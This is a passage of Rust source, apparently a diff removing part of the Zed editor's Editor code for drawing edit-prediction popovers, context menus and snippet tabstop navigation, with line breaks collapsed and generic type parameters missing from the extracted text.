{ - editor.set_breakpoint_context_menu(row, position, event.down.position, window, cx); - })) - } - - pub fn context_menu_visible(&self) -> bool { - !self.edit_prediction_preview_is_active() - && self - .context_menu - .borrow() - .as_ref() - .map_or(false, |menu| menu.visible()) - } - - fn context_menu_origin(&self) -> Option { - self.context_menu - .borrow() - .as_ref() - .map(|menu| menu.origin()) - } - - pub fn set_context_menu_options(&mut self, options: ContextMenuOptions) { - self.context_menu_options = Some(options); - } - - const EDIT_PREDICTION_POPOVER_PADDING_X: Pixels = Pixels(24.); - const EDIT_PREDICTION_POPOVER_PADDING_Y: Pixels = Pixels(2.); - - fn render_edit_prediction_popover( - &mut self, - text_bounds: &Bounds, - content_origin: gpui::Point, - editor_snapshot: &EditorSnapshot, - visible_row_range: Range, - scroll_top: f32, - scroll_bottom: f32, - line_layouts: &[LineWithInvisibles], - line_height: Pixels, - scroll_pixel_position: gpui::Point, - newest_selection_head: Option, - editor_width: Pixels, - style: &EditorStyle, - window: &mut Window, - cx: &mut App, - ) -> Option<(AnyElement, gpui::Point)> { - let active_inline_completion = self.active_inline_completion.as_ref()?; - - if self.edit_prediction_visible_in_cursor_popover(true) { - return None; - } - - match &active_inline_completion.completion { - InlineCompletion::Move { target, .. } => { - let target_display_point = target.to_display_point(editor_snapshot); - - if self.edit_prediction_requires_modifier() { - if !self.edit_prediction_preview_is_active() { - return None; - } - - self.render_edit_prediction_modifier_jump_popover( - text_bounds, - content_origin, - visible_row_range, - line_layouts, - line_height, - scroll_pixel_position, - newest_selection_head, - target_display_point, - window, - cx, - ) - } else { - self.render_edit_prediction_eager_jump_popover( - text_bounds, - content_origin, - editor_snapshot, - visible_row_range, - scroll_top, - scroll_bottom, - line_height, - scroll_pixel_position, - target_display_point, - editor_width, - window, - cx, - ) - } - } - InlineCompletion::Edit { - display_mode: EditDisplayMode::Inline, - .. - } => None, - InlineCompletion::Edit { - display_mode: EditDisplayMode::TabAccept, - edits, - .. - } => { - let range = &edits.first()?.0; - let target_display_point = range.end.to_display_point(editor_snapshot); - - self.render_edit_prediction_end_of_line_popover( - "Accept", - editor_snapshot, - visible_row_range, - target_display_point, - line_height, - scroll_pixel_position, - content_origin, - editor_width, - window, - cx, - ) - } - InlineCompletion::Edit { - edits, - edit_preview, - display_mode: EditDisplayMode::DiffPopover, - snapshot, - } => self.render_edit_prediction_diff_popover( - text_bounds, - content_origin, - editor_snapshot, - visible_row_range, - line_layouts, - line_height, - scroll_pixel_position, - newest_selection_head, - editor_width, - style, - edits, - edit_preview, - snapshot, - window, - cx, - ), - } - } - - fn render_edit_prediction_modifier_jump_popover( - &mut self, - text_bounds: &Bounds, - content_origin: gpui::Point, - visible_row_range: Range, - line_layouts: &[LineWithInvisibles], - line_height: Pixels, - scroll_pixel_position: gpui::Point, - newest_selection_head: Option, - target_display_point: DisplayPoint, - window: &mut Window, - cx: &mut App, - ) -> Option<(AnyElement, gpui::Point)> { - let scrolled_content_origin = - content_origin - gpui::Point::new(scroll_pixel_position.x, Pixels(0.0)); - - const SCROLL_PADDING_Y: Pixels = px(12.); - - if target_display_point.row() < visible_row_range.start { - return self.render_edit_prediction_scroll_popover( - |_| SCROLL_PADDING_Y, - IconName::ArrowUp, - visible_row_range, - line_layouts, - newest_selection_head, - scrolled_content_origin, - window, - cx, - ); - } else if target_display_point.row() >= visible_row_range.end { - return self.render_edit_prediction_scroll_popover( - |size| text_bounds.size.height - size.height - SCROLL_PADDING_Y, - IconName::ArrowDown, - visible_row_range, - line_layouts, - newest_selection_head, - scrolled_content_origin, - window, - cx, - ); - } - - const POLE_WIDTH: Pixels = px(2.); - - let line_layout = - line_layouts.get(target_display_point.row().minus(visible_row_range.start) as usize)?; - let target_column = target_display_point.column() as usize; - - let target_x = line_layout.x_for_index(target_column); - let target_y = - (target_display_point.row().as_f32() * line_height) - scroll_pixel_position.y; - - let flag_on_right = target_x < text_bounds.size.width / 2.; - - let mut border_color = Self::edit_prediction_callout_popover_border_color(cx); - border_color.l += 0.001; - - let mut element = v_flex() - .items_end() - .when(flag_on_right, |el| el.items_start()) - .child(if flag_on_right { - self.render_edit_prediction_line_popover("Jump", None, window, cx)? - .rounded_bl(px(0.)) - .rounded_tl(px(0.)) - .border_l_2() - .border_color(border_color) - } else { - self.render_edit_prediction_line_popover("Jump", None, window, cx)? - .rounded_br(px(0.)) - .rounded_tr(px(0.)) - .border_r_2() - .border_color(border_color) - }) - .child(div().w(POLE_WIDTH).bg(border_color).h(line_height)) - .into_any(); - - let size = element.layout_as_root(AvailableSpace::min_size(), window, cx); - - let mut origin = scrolled_content_origin + point(target_x, target_y) - - point( - if flag_on_right { - POLE_WIDTH - } else { - size.width - POLE_WIDTH - }, - size.height - line_height, - ); - - origin.x = origin.x.max(content_origin.x); - - element.prepaint_at(origin, window, cx); - - Some((element, origin)) - } - - fn render_edit_prediction_scroll_popover( - &mut self, - to_y: impl Fn(Size) -> Pixels, - scroll_icon: IconName, - visible_row_range: Range, - line_layouts: &[LineWithInvisibles], - newest_selection_head: Option, - scrolled_content_origin: gpui::Point, - window: &mut Window, - cx: &mut App, - ) -> Option<(AnyElement, gpui::Point)> { - let mut element = self - .render_edit_prediction_line_popover("Scroll", Some(scroll_icon), window, cx)? - .into_any(); - - let size = element.layout_as_root(AvailableSpace::min_size(), window, cx); - - let cursor = newest_selection_head?; - let cursor_row_layout = - line_layouts.get(cursor.row().minus(visible_row_range.start) as usize)?; - let cursor_column = cursor.column() as usize; - - let cursor_character_x = cursor_row_layout.x_for_index(cursor_column); - - let origin = scrolled_content_origin + point(cursor_character_x, to_y(size)); - - element.prepaint_at(origin, window, cx); - Some((element, origin)) - } - - fn render_edit_prediction_eager_jump_popover( - &mut self, - text_bounds: &Bounds, - content_origin: gpui::Point, - editor_snapshot: &EditorSnapshot, - visible_row_range: Range, - scroll_top: f32, - scroll_bottom: f32, - line_height: Pixels, - scroll_pixel_position: gpui::Point, - target_display_point: DisplayPoint, - editor_width: Pixels, - window: &mut Window, - cx: &mut App, - ) -> Option<(AnyElement, gpui::Point)> { - if target_display_point.row().as_f32() < scroll_top { - let mut element = self - .render_edit_prediction_line_popover( - "Jump to Edit", - Some(IconName::ArrowUp), - window, - cx, - )? - .into_any(); - - let size = element.layout_as_root(AvailableSpace::min_size(), window, cx); - let offset = point( - (text_bounds.size.width - size.width) / 2., - Self::EDIT_PREDICTION_POPOVER_PADDING_Y, - ); - - let origin = text_bounds.origin + offset; - element.prepaint_at(origin, window, cx); - Some((element, origin)) - } else if (target_display_point.row().as_f32() + 1.) > scroll_bottom { - let mut element = self - .render_edit_prediction_line_popover( - "Jump to Edit", - Some(IconName::ArrowDown), - window, - cx, - )? - .into_any(); - - let size = element.layout_as_root(AvailableSpace::min_size(), window, cx); - let offset = point( - (text_bounds.size.width - size.width) / 2., - text_bounds.size.height - size.height - Self::EDIT_PREDICTION_POPOVER_PADDING_Y, - ); - - let origin = text_bounds.origin + offset; - element.prepaint_at(origin, window, cx); - Some((element, origin)) - } else { - self.render_edit_prediction_end_of_line_popover( - "Jump to Edit", - editor_snapshot, - visible_row_range, - target_display_point, - line_height, - scroll_pixel_position, - content_origin, - editor_width, - window, - cx, - ) - } - } - - fn render_edit_prediction_end_of_line_popover( - self: &mut Editor, - label: &'static str, - editor_snapshot: &EditorSnapshot, - visible_row_range: Range, - target_display_point: DisplayPoint, - line_height: Pixels, - scroll_pixel_position: gpui::Point, - content_origin: gpui::Point, - editor_width: Pixels, - window: &mut Window, - cx: &mut App, - ) -> Option<(AnyElement, gpui::Point)> { - let target_line_end = DisplayPoint::new( - target_display_point.row(), - editor_snapshot.line_len(target_display_point.row()), - ); - - let mut element = self - .render_edit_prediction_line_popover(label, None, window, cx)? - .into_any(); - - let size = element.layout_as_root(AvailableSpace::min_size(), window, cx); - - let line_origin = self.display_to_pixel_point(target_line_end, editor_snapshot, window)?; - - let start_point = content_origin - point(scroll_pixel_position.x, Pixels::ZERO); - let mut origin = start_point - + line_origin - + point(Self::EDIT_PREDICTION_POPOVER_PADDING_X, Pixels::ZERO); - origin.x = origin.x.max(content_origin.x); - - let max_x = content_origin.x + editor_width - size.width; - - if origin.x > max_x { - let offset = line_height + Self::EDIT_PREDICTION_POPOVER_PADDING_Y; - - let icon = if visible_row_range.contains(&(target_display_point.row() + 2)) { - origin.y += offset; - IconName::ArrowUp - } else { - origin.y -= offset; - IconName::ArrowDown - }; - - element = self - .render_edit_prediction_line_popover(label, Some(icon), window, cx)? - .into_any(); - - let size = element.layout_as_root(AvailableSpace::min_size(), window, cx); - - origin.x = content_origin.x + editor_width - size.width - px(2.); - } - - element.prepaint_at(origin, window, cx); - Some((element, origin)) - } - - fn render_edit_prediction_diff_popover( - self: &Editor, - text_bounds: &Bounds, - content_origin: gpui::Point, - editor_snapshot: &EditorSnapshot, - visible_row_range: Range, - line_layouts: &[LineWithInvisibles], - line_height: Pixels, - scroll_pixel_position: gpui::Point, - newest_selection_head: Option, - editor_width: Pixels, - style: &EditorStyle, - edits: &Vec<(Range, String)>, - edit_preview: &Option, - snapshot: &language::BufferSnapshot, - window: &mut Window, - cx: &mut App, - ) -> Option<(AnyElement, gpui::Point)> { - let edit_start = edits - .first() - .unwrap() - .0 - .start - .to_display_point(editor_snapshot); - let edit_end = edits - .last() - .unwrap() - .0 - .end - .to_display_point(editor_snapshot); - - let is_visible = visible_row_range.contains(&edit_start.row()) - || visible_row_range.contains(&edit_end.row()); - if !is_visible { - return None; - } - - let highlighted_edits = - crate::inline_completion_edit_text(&snapshot, edits, edit_preview.as_ref()?, false, cx); - - let styled_text = highlighted_edits.to_styled_text(&style.text); - let line_count = highlighted_edits.text.lines().count(); - - const BORDER_WIDTH: Pixels = px(1.); - - let keybind = self.render_edit_prediction_accept_keybind(window, cx); - let has_keybind = keybind.is_some(); - - let mut element = h_flex() - .items_start() - .child( - h_flex() - .bg(cx.theme().colors().editor_background) - .border(BORDER_WIDTH) - .shadow_sm() - .border_color(cx.theme().colors().border) - .rounded_l_lg() - .when(line_count > 1, |el| el.rounded_br_lg()) - .pr_1() - .child(styled_text), - ) - .child( - h_flex() - .h(line_height + BORDER_WIDTH * 2.) - .px_1p5() - .gap_1() - // Workaround: For some reason, there's a gap if we don't do this - .ml(-BORDER_WIDTH) - .shadow(vec![gpui::BoxShadow { - color: gpui::black().opacity(0.05), - offset: point(px(1.), px(1.)), - blur_radius: px(2.), - spread_radius: px(0.), - }]) - .bg(Editor::edit_prediction_line_popover_bg_color(cx)) - .border(BORDER_WIDTH) - .border_color(cx.theme().colors().border) - .rounded_r_lg() - .id("edit_prediction_diff_popover_keybind") - .when(!has_keybind, |el| { - let status_colors = cx.theme().status(); - - el.bg(status_colors.error_background) - .border_color(status_colors.error.opacity(0.6)) - .child(Icon::new(IconName::Info).color(Color::Error)) - .cursor_default() - .hoverable_tooltip(move |_window, cx| { - cx.new(|_| MissingEditPredictionKeybindingTooltip).into() - }) - }) - .children(keybind), - ) - .into_any(); - - let longest_row = - editor_snapshot.longest_row_in_range(edit_start.row()..edit_end.row() + 1); - let longest_line_width = if visible_row_range.contains(&longest_row) { - line_layouts[(longest_row.0 - visible_row_range.start.0) as usize].width - } else { - layout_line( - longest_row, - editor_snapshot, - style, - editor_width, - |_| false, - window, - cx, - ) - .width - }; - - let viewport_bounds = - Bounds::new(Default::default(), window.viewport_size()).extend(Edges { - right: -EditorElement::SCROLLBAR_WIDTH, - ..Default::default() - }); - - let x_after_longest = - text_bounds.origin.x + longest_line_width + Self::EDIT_PREDICTION_POPOVER_PADDING_X - - scroll_pixel_position.x; - - let element_bounds = element.layout_as_root(AvailableSpace::min_size(), window, cx); - - // Fully visible if it can be displayed within the window (allow overlapping other - // panes). However, this is only allowed if the popover starts within text_bounds. - let can_position_to_the_right = x_after_longest < text_bounds.right() - && x_after_longest + element_bounds.width < viewport_bounds.right(); - - let mut origin = if can_position_to_the_right { - point( - x_after_longest, - text_bounds.origin.y + edit_start.row().as_f32() * line_height - - scroll_pixel_position.y, - ) - } else { - let cursor_row = newest_selection_head.map(|head| head.row()); - let above_edit = edit_start - .row() - .0 - .checked_sub(line_count as u32) - .map(DisplayRow); - let below_edit = Some(edit_end.row() + 1); - let above_cursor = - cursor_row.and_then(|row| row.0.checked_sub(line_count as u32).map(DisplayRow)); - let below_cursor = cursor_row.map(|cursor_row| cursor_row + 1); - - // Place the edit popover adjacent to the edit if there is a location - // available that is onscreen and does not obscure the cursor. Otherwise, - // place it adjacent to the cursor. - let row_target = [above_edit, below_edit, above_cursor, below_cursor] - .into_iter() - .flatten() - .find(|&start_row| { - let end_row = start_row + line_count as u32; - visible_row_range.contains(&start_row) - && visible_row_range.contains(&end_row) - && cursor_row.map_or(true, |cursor_row| { - !((start_row..end_row).contains(&cursor_row)) - }) - })?; - - content_origin - + point( - -scroll_pixel_position.x, - row_target.as_f32() * line_height - scroll_pixel_position.y, - ) - }; - - origin.x -= BORDER_WIDTH; - - window.defer_draw(element, origin, 1); - - // Do not return an element, since it will already be drawn due to defer_draw. - None - } - - fn edit_prediction_cursor_popover_height(&self) -> Pixels { - px(30.) - } - - fn current_user_player_color(&self, cx: &mut App) -> PlayerColor { - if self.read_only(cx) { - cx.theme().players().read_only() - } else { - self.style.as_ref().unwrap().local_player - } - } - - fn render_edit_prediction_accept_keybind( - &self, - window: &mut Window, - cx: &App, - ) -> Option { - let accept_binding = self.accept_edit_prediction_keybind(window, cx); - let accept_keystroke = accept_binding.keystroke()?; - - let is_platform_style_mac = PlatformStyle::platform() == PlatformStyle::Mac; - - let modifiers_color = if accept_keystroke.modifiers == window.modifiers() { - Color::Accent - } else { - Color::Muted - }; - - h_flex() - .px_0p5() - .when(is_platform_style_mac, |parent| parent.gap_0p5()) - .font(theme_settings::ThemeSettings::get_global(cx).buffer_font.clone()) - .text_size(TextSize::XSmall.rems(cx)) - .child(h_flex().children(ui::render_modifiers( - &accept_keystroke.modifiers, - PlatformStyle::platform(), - Some(modifiers_color), - Some(IconSize::XSmall.rems().into()), - true, - ))) - .when(is_platform_style_mac, |parent| { - parent.child(accept_keystroke.key.clone()) - }) - .when(!is_platform_style_mac, |parent| { - parent.child( - Key::new( - util::capitalize(&accept_keystroke.key), - Some(Color::Default), - ) - .size(Some(IconSize::XSmall.rems().into())), - ) - }) - .into_any() - .into() - } - - fn render_edit_prediction_line_popover( - &self, - label: impl Into, - icon: Option, - window: &mut Window, - cx: &App, - ) -> Option> { - let padding_right = if icon.is_some() { px(4.) } else { px(8.) }; - - let keybind = self.render_edit_prediction_accept_keybind(window, cx); - let has_keybind = keybind.is_some(); - - let result = h_flex() - .id("ep-line-popover") - .py_0p5() - .pl_1() - .pr(padding_right) - .gap_1() - .rounded_md() - .border_1() - .bg(Self::edit_prediction_line_popover_bg_color(cx)) - .border_color(Self::edit_prediction_callout_popover_border_color(cx)) - .shadow_sm() - .when(!has_keybind, |el| { - let status_colors = cx.theme().status(); - - el.bg(status_colors.error_background) - .border_color(status_colors.error.opacity(0.6)) - .pl_2() - .child(Icon::new(IconName::ZedPredictError).color(Color::Error)) - .cursor_default() - .hoverable_tooltip(move |_window, cx| { - cx.new(|_| MissingEditPredictionKeybindingTooltip).into() - }) - }) - .children(keybind) - .child( - Label::new(label) - .size(LabelSize::Small) - .when(!has_keybind, |el| { - el.color(cx.theme().status().error.into()).strikethrough() - }), - ) - .when(!has_keybind, |el| { - el.child( - h_flex().ml_1().child( - Icon::new(IconName::Info) - .size(IconSize::Small) - .color(cx.theme().status().error.into()), - ), - ) - }) - .when_some(icon, |element, icon| { - element.child( - div() - .mt(px(1.5)) - .child(Icon::new(icon).size(IconSize::Small)), - ) - }); - - Some(result) - } - - fn edit_prediction_line_popover_bg_color(cx: &App) -> Hsla { - let accent_color = cx.theme().colors().text_accent; - let editor_bg_color = cx.theme().colors().editor_background; - editor_bg_color.blend(accent_color.opacity(0.1)) - } - - fn edit_prediction_callout_popover_border_color(cx: &App) -> Hsla { - let accent_color = cx.theme().colors().text_accent; - let editor_bg_color = cx.theme().colors().editor_background; - editor_bg_color.blend(accent_color.opacity(0.6)) - } - - fn render_edit_prediction_cursor_popover( - &self, - min_width: Pixels, - max_width: Pixels, - cursor_point: Point, - style: &EditorStyle, - accept_keystroke: Option<&gpui::Keystroke>, - _window: &Window, - cx: &mut Context, - ) -> Option { - let provider = self.edit_prediction_provider.as_ref()?; - - if provider.provider.needs_terms_acceptance(cx) { - return Some( - h_flex() - .min_w(min_width) - .flex_1() - .px_2() - .py_1() - .gap_3() - .elevation_2(cx) - .hover(|style| style.bg(cx.theme().colors().element_hover)) - .id("accept-terms") - .cursor_pointer() - .on_mouse_down(MouseButton::Left, |_, window, _| window.prevent_default()) - .on_click(cx.listener(|this, _event, window, cx| { - cx.stop_propagation(); - this.report_editor_event("Edit Prediction Provider ToS Clicked", None, cx); - window.dispatch_action( - zed_actions::OpenZedPredictOnboarding.boxed_clone(), - cx, - ); - })) - .child( - h_flex() - .flex_1() - .gap_2() - .child(Icon::new(IconName::ZedPredict)) - .child(Label::new("Accept Terms of Service")) - .child(div().w_full()) - .child( - Icon::new(IconName::ArrowUpRight) - .color(Color::Muted) - .size(IconSize::Small), - ) - .into_any_element(), - ) - .into_any(), - ); - } - - let is_refreshing = provider.provider.is_refreshing(cx); - - fn pending_completion_container() -> Div { - h_flex() - .h_full() - .flex_1() - .gap_2() - .child(Icon::new(IconName::ZedPredict)) - } - - let completion = match &self.active_inline_completion { - Some(prediction) => { - if !self.has_visible_completions_menu() { - const RADIUS: Pixels = px(6.); - const BORDER_WIDTH: Pixels = px(1.); - - return Some( - h_flex() - .elevation_2(cx) - .border(BORDER_WIDTH) - .border_color(cx.theme().colors().border) - .when(accept_keystroke.is_none(), |el| { - el.border_color(cx.theme().status().error) - }) - .rounded(RADIUS) - .rounded_tl(px(0.)) - .overflow_hidden() - .child(div().px_1p5().child(match &prediction.completion { - InlineCompletion::Move { target, snapshot } => { - use text::ToPoint as _; - if target.text_anchor.to_point(&snapshot).row > cursor_point.row - { - Icon::new(IconName::ZedPredictDown) - } else { - Icon::new(IconName::ZedPredictUp) - } - } - InlineCompletion::Edit { .. } => Icon::new(IconName::ZedPredict), - })) - .child( - h_flex() - .gap_1() - .py_1() - .px_2() - .rounded_r(RADIUS - BORDER_WIDTH) - .border_l_1() - .border_color(cx.theme().colors().border) - .bg(Self::edit_prediction_line_popover_bg_color(cx)) - .when(self.edit_prediction_preview.released_too_fast(), |el| { - el.child( - Label::new("Hold") - .size(LabelSize::Small) - .when(accept_keystroke.is_none(), |el| { - el.strikethrough() - }) - .line_height_style(LineHeightStyle::UiLabel), - ) - }) - .id("edit_prediction_cursor_popover_keybind") - .when(accept_keystroke.is_none(), |el| { - let status_colors = cx.theme().status(); - - el.bg(status_colors.error_background) - .border_color(status_colors.error.opacity(0.6)) - .child(Icon::new(IconName::Info).color(Color::Error)) - .cursor_default() - .hoverable_tooltip(move |_window, cx| { - cx.new(|_| MissingEditPredictionKeybindingTooltip) - .into() - }) - }) - .when_some( - accept_keystroke.as_ref(), - |el, accept_keystroke| { - el.child(h_flex().children(ui::render_modifiers( - &accept_keystroke.modifiers, - PlatformStyle::platform(), - Some(Color::Default), - Some(IconSize::XSmall.rems().into()), - false, - ))) - }, - ), - ) - .into_any(), - ); - } - - self.render_edit_prediction_cursor_popover_preview( - prediction, - cursor_point, - style, - cx, - )? - } - - None if is_refreshing => match &self.stale_inline_completion_in_menu { - Some(stale_completion) => self.render_edit_prediction_cursor_popover_preview( - stale_completion, - cursor_point, - style, - cx, - )?, - - None => { - pending_completion_container().child(Label::new("...").size(LabelSize::Small)) - } - }, - - None => pending_completion_container().child(Label::new("No Prediction")), - }; - - let completion = if is_refreshing { - completion - .with_animation( - "loading-completion", - Animation::new(Duration::from_secs(2)) - .repeat() - .with_easing(pulsating_between(0.4, 0.8)), - |label, delta| label.opacity(delta), - ) - .into_any_element() - } else { - completion.into_any_element() - }; - - let has_completion = self.active_inline_completion.is_some(); - - let is_platform_style_mac = PlatformStyle::platform() == PlatformStyle::Mac; - Some( - h_flex() - .min_w(min_width) - .max_w(max_width) - .flex_1() - .elevation_2(cx) - .border_color(cx.theme().colors().border) - .child( - div() - .flex_1() - .py_1() - .px_2() - .overflow_hidden() - .child(completion), - ) - .when_some(accept_keystroke, |el, accept_keystroke| { - if !accept_keystroke.modifiers.modified() { - return el; - } - - el.child( - h_flex() - .h_full() - .border_l_1() - .rounded_r_lg() - .border_color(cx.theme().colors().border) - .bg(Self::edit_prediction_line_popover_bg_color(cx)) - .gap_1() - .py_1() - .px_2() - .child( - h_flex() - .font(theme_settings::ThemeSettings::get_global(cx).buffer_font.clone()) - .when(is_platform_style_mac, |parent| parent.gap_1()) - .child(h_flex().children(ui::render_modifiers( - &accept_keystroke.modifiers, - PlatformStyle::platform(), - Some(if !has_completion { - Color::Muted - } else { - Color::Default - }), - None, - false, - ))), - ) - .child(Label::new("Preview").into_any_element()) - .opacity(if has_completion { 1.0 } else { 0.4 }), - ) - }) - .into_any(), - ) - } - - fn render_edit_prediction_cursor_popover_preview( - &self, - completion: &InlineCompletionState, - cursor_point: Point, - style: &EditorStyle, - cx: &mut Context, - ) -> Option
{ - use text::ToPoint as _; - - fn render_relative_row_jump( - prefix: impl Into, - current_row: u32, - target_row: u32, - ) -> Div { - let (row_diff, arrow) = if target_row < current_row { - (current_row - target_row, IconName::ArrowUp) - } else { - (target_row - current_row, IconName::ArrowDown) - }; - - h_flex() - .child( - Label::new(format!("{}{}", prefix.into(), row_diff)) - .color(Color::Muted) - .size(LabelSize::Small), - ) - .child(Icon::new(arrow).color(Color::Muted).size(IconSize::Small)) - } - - match &completion.completion { - InlineCompletion::Move { - target, snapshot, .. - } => Some( - h_flex() - .px_2() - .gap_2() - .flex_1() - .child( - if target.text_anchor.to_point(&snapshot).row > cursor_point.row { - Icon::new(IconName::ZedPredictDown) - } else { - Icon::new(IconName::ZedPredictUp) - }, - ) - .child(Label::new("Jump to Edit")), - ), - - InlineCompletion::Edit { - edits, - edit_preview, - snapshot, - display_mode: _, - } => { - let first_edit_row = edits.first()?.0.start.text_anchor.to_point(&snapshot).row; - - let (highlighted_edits, has_more_lines) = crate::inline_completion_edit_text( - &snapshot, - &edits, - edit_preview.as_ref()?, - true, - cx, - ) - .first_line_preview(); - - let styled_text = gpui::StyledText::new(highlighted_edits.text) - .with_default_highlights(&style.text, highlighted_edits.highlights); - - let preview = h_flex() - .gap_1() - .min_w_16() - .child(styled_text) - .when(has_more_lines, |parent| parent.child("…")); - - let left = if first_edit_row != cursor_point.row { - render_relative_row_jump("", cursor_point.row, first_edit_row) - .into_any_element() - } else { - Icon::new(IconName::ZedPredict).into_any_element() - }; - - Some( - h_flex() - .h_full() - .flex_1() - .gap_2() - .pr_1() - .overflow_x_hidden() - .font(theme_settings::ThemeSettings::get_global(cx).buffer_font.clone()) - .child(left) - .child(preview), - ) - } - } - } - - fn render_context_menu( - &self, - style: &EditorStyle, - max_height_in_lines: u32, - window: &mut Window, - cx: &mut Context, - ) -> Option { - let menu = self.context_menu.borrow(); - let menu = menu.as_ref()?; - if !menu.visible() { - return None; - }; - Some(menu.render(style, max_height_in_lines, window, cx)) - } - - fn render_context_menu_aside( - &mut self, - max_size: Size, - window: &mut Window, - cx: &mut Context, - ) -> Option { - self.context_menu.borrow_mut().as_mut().and_then(|menu| { - if menu.visible() { - menu.render_aside(self, max_size, window, cx) - } else { - None - } - }) - } - - fn hide_context_menu( - &mut self, - window: &mut Window, - cx: &mut Context, - ) -> Option { - cx.notify(); - self.completion_tasks.clear(); - let context_menu = self.context_menu.borrow_mut().take(); - self.stale_inline_completion_in_menu.take(); - self.update_visible_inline_completion(window, cx); - context_menu - } - - fn show_snippet_choices( - &mut self, - choices: &Vec, - selection: Range, - cx: &mut Context, - ) { - if selection.start.buffer_id.is_none() { - return; - } - let buffer_id = selection.start.buffer_id.unwrap(); - let buffer = self.buffer().read(cx).buffer(buffer_id); - let id = post_inc(&mut self.next_completion_id); - let snippet_sort_order = EditorSettings::get_global(cx).snippet_sort_order; - - if let Some(buffer) = buffer { - *self.context_menu.borrow_mut() = Some(CodeContextMenu::Completions( - CompletionsMenu::new_snippet_choices( - id, - true, - choices, - selection, - buffer, - snippet_sort_order, - ), - )); - } - } - - pub fn insert_snippet( - &mut self, - insertion_ranges: &[Range], - snippet: Snippet, - window: &mut Window, - cx: &mut Context, - ) -> Result<()> { - struct Tabstop { - is_end_tabstop: bool, - ranges: Vec>, - choices: Option>, - } - - let tabstops = self.buffer.update(cx, |buffer, cx| { - let snippet_text: Arc = snippet.text.clone().into(); - let edits = insertion_ranges - .iter() - .cloned() - .map(|range| (range, snippet_text.clone())); - buffer.edit(edits, Some(AutoindentMode::EachLine), cx); - - let snapshot = &*buffer.read(cx); - let snippet = &snippet; - snippet - .tabstops - .iter() - .map(|tabstop| { - let is_end_tabstop = tabstop.ranges.first().map_or(false, |tabstop| { - tabstop.is_empty() && tabstop.start == snippet.text.len() as isize - }); - let mut tabstop_ranges = tabstop - .ranges - .iter() - .flat_map(|tabstop_range| { - let mut delta = 0_isize; - insertion_ranges.iter().map(move |insertion_range| { - let insertion_start = insertion_range.start as isize + delta; - delta += - snippet.text.len() as isize - insertion_range.len() as isize; - - let start = ((insertion_start + tabstop_range.start) as usize) - .min(snapshot.len()); - let end = ((insertion_start + tabstop_range.end) as usize) - .min(snapshot.len()); - snapshot.anchor_before(start)..snapshot.anchor_after(end) - }) - }) - .collect::>(); - tabstop_ranges.sort_unstable_by(|a, b| a.start.cmp(&b.start, snapshot)); - - Tabstop { - is_end_tabstop, - ranges: tabstop_ranges, - choices: tabstop.choices.clone(), - } - }) - .collect::>() - }); - if let Some(tabstop) = tabstops.first() { - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select_ranges(tabstop.ranges.iter().cloned()); - }); - - if let Some(choices) = &tabstop.choices { - if let Some(selection) = tabstop.ranges.first() { - self.show_snippet_choices(choices, selection.clone(), cx) - } - } - - // If we're already at the last tabstop and it's at the end of the snippet, - // we're done, we don't need to keep the state around. - if !tabstop.is_end_tabstop { - let choices = tabstops - .iter() - .map(|tabstop| tabstop.choices.clone()) - .collect(); - - let ranges = tabstops - .into_iter() - .map(|tabstop| tabstop.ranges) - .collect::>(); - - self.snippet_stack.push(SnippetState { - active_index: 0, - ranges, - choices, - }); - } - - // Check whether the just-entered snippet ends with an auto-closable bracket. - if self.autoclose_regions.is_empty() { - let snapshot = self.buffer.read(cx).snapshot(cx); - for selection in &mut self.selections.all::(cx) { - let selection_head = selection.head(); - let Some(scope) = snapshot.language_scope_at(selection_head) else { - continue; - }; - - let mut bracket_pair = None; - let next_chars = snapshot.chars_at(selection_head).collect::(); - let prev_chars = snapshot - .reversed_chars_at(selection_head) - .collect::(); - for (pair, enabled) in scope.brackets() { - if enabled - && pair.close - && prev_chars.starts_with(pair.start.as_str()) - && next_chars.starts_with(pair.end.as_str()) - { - bracket_pair = Some(pair.clone()); - break; - } - } - if let Some(pair) = bracket_pair { - let snapshot_settings = snapshot.language_settings_at(selection_head, cx); - let autoclose_enabled = - self.use_autoclose && snapshot_settings.use_autoclose; - if autoclose_enabled { - let start = snapshot.anchor_after(selection_head); - let end = snapshot.anchor_after(selection_head); - self.autoclose_regions.push(AutocloseRegion { - selection_id: selection.id, - range: start..end, - pair, - }); - } - } - } - } - } - Ok(()) - } - - pub fn move_to_next_snippet_tabstop( - &mut self, - window: &mut Window, - cx: &mut Context, - ) -> bool { - self.move_to_snippet_tabstop(Bias::Right, window, cx) - } - - pub fn move_to_prev_snippet_tabstop( - &mut self, - window: &mut Window, - cx: &mut Context, - ) -> bool { - self.move_to_snippet_tabstop(Bias::Left, window, cx) - } - - pub fn move_to_snippet_tabstop( - &mut self, - bias: Bias, - window: &mut Window, - cx: &mut Context, - ) -> bool { - if let Some(mut snippet) = self.snippet_stack.pop() { - match bias { - Bias::Left => { - if snippet.active_index > 0 { - snippet.active_index -= 1; - } else { - self.snippet_stack.push(snippet); - return false; - } - } - Bias::Right => { - if snippet.active_index + 1 < snippet.ranges.len() { - snippet.active_index += 1; - } else { - self.snippet_stack.push(snippet); - return false; - } - } - } - if let Some(current_ranges) = snippet.ranges.get(snippet.active_index) { - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select_anchor_ranges(current_ranges.iter().cloned()) - }); - - if let Some(choices) = &snippet.choices[snippet.active_index] { - if let Some(selection) = current_ranges.first() { - self.show_snippet_choices(&choices, selection.clone(), cx); - } - } - - // If snippet state is not at the last tabstop, push it back on the stack - if snippet.active_index + 1 < snippet.ranges.len() { - self.snippet_stack.push(snippet); - } - return true; - } - } - - false - } - - pub fn clear(&mut self, window: &mut Window, cx: &mut Context) { - self.transact(window, cx, |this, window, cx| { - this.select_all(&SelectAll, window, cx); - this.insert("", window, cx); - }); - } - - pub fn backspace(&mut self, _: &Backspace, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.transact(window, cx, |this, window, cx| { - this.select_autoclose_pair(window, cx); - let mut linked_ranges = HashMap::<_, Vec<_>>::default(); - if !this.linked_edit_ranges.is_empty() { - let selections = this.selections.all::(cx); - let snapshot = this.buffer.read(cx).snapshot(cx); - - for selection in selections.iter() { - let selection_start = snapshot.anchor_before(selection.start).text_anchor; - let selection_end = snapshot.anchor_after(selection.end).text_anchor; - if selection_start.buffer_id != selection_end.buffer_id { - continue; - } - if let Some(ranges) = - this.linked_editing_ranges_for(selection_start..selection_end, cx) - { - for (buffer, entries) in ranges { - linked_ranges.entry(buffer).or_default().extend(entries); - } - } - } - } - - let mut selections = 